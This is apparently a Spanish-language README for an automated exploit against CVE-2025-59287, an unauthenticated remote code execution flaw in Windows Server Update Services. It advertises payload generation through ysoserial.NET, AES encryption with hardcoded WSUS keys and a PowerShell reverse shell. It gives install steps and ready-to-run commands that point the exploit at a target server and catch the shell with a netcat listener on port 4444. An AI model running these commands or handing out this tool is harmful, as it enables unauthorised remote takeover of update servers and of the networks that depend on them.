
Exploit automatizado para CVE-2025-59287, una RCE no autenticada en WSUS, que incluye generación de payloads, listener de reverse shell y cifrado AES con claves hardcodeadas.
Exploit automatizado para la vulnerabilidad de ejecución remota de código no autenticada en Windows Server Update Services (WSUS).
✅ Generación de payload totalmente automatizada
✅ Descarga automática de la dependencia ysoserial.NET
✅ Listener de reverse shell integrado
✅ Soporte multiplataforma (Windows/Linux/Mac)
✅ Cifrado AES con claves hardcodeadas de WSUS
✅ Payload de reverse shell en PowerShell
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
Clona o descarga los archivos del exploit
cd CVE-2025-59287-exploit
Ejecuta el exploit (descarga automáticamente ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost TU_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
Terminal 1: Inicia el listener de netcat
nc -lvnp 4444
Terminal 2: Ejecuta el exploit sin el listener integrado
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener